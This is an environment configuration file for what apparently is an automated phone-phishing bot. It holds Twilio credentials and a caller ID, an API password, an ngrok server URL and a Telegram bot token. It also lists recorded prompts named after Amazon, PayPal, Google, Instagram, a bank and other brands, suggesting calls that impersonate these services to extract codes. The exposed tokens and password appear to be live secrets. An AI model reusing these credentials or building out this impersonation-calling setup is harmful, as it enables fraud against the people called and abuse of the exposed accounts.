# General Setup
SETUP_DONE=true

# Twilio Configuration
TWILIO_ACCOUNT_SID=ACfd3a654e2bdd5ecd71954e729521c6e5
TWILIO_AUTH_TOKEN=e1099c33095d872847bcf37315e591ea
TWILIO_CALLER_ID=+18666146182

# API Configuration
API_PASSWORD=Hanaffypab087$&!lo
SERVER_URL=https://warthog-awake-morally.ngrok-free.app

# Telegram Bot Configuration
TELEGRAM_CHAT_ID=5190941478
TELEGRAM_BOT_TOKEN=6470896987:AAEP-hAizwk0HZHZjlzIXudL7BevwBzp-yA

# File Paths
AMAZON_FILE_PATH=./voice/en/amazon/ask-amazon.mp3
CDISCOUNT_FILE_PATH=./voice/en/cdiscount/ask-cdiscount.mp3
TWITTER_FILE_PATH=./voice/en/twitter/ask-twitter.mp3
WHATSAPP_FILE_PATH=./voice/en/whatsapp/ask-whatsapp.mp3
PAYPAL_FILE_PATH=./voice/en/paypal/ask-pp.mp3
GOOGLE_FILE_PATH=./voice/en/google/ask-google.mp3
SNAPCHAT_FILE_PATH=./voice/en/snapchat/ask-snapchat.mp3
INSTAGRAM_FILE_PATH=./voice/en/instagram/ask-instagram.mp3
FACEBOOK_FILE_PATH=./voice/en/facebook/ask-facebook.mp3
END_FILE_PATH=./voice/en/done/call-done.mp3
DEFAULT_FILE_PATH=./voice/en/default/ask-default.mp3
BANQUE_FILE_PATH=./voice/en/banque/ask-banque.mp3

# SMS Content
PAYPAL_SMS=pp test 123
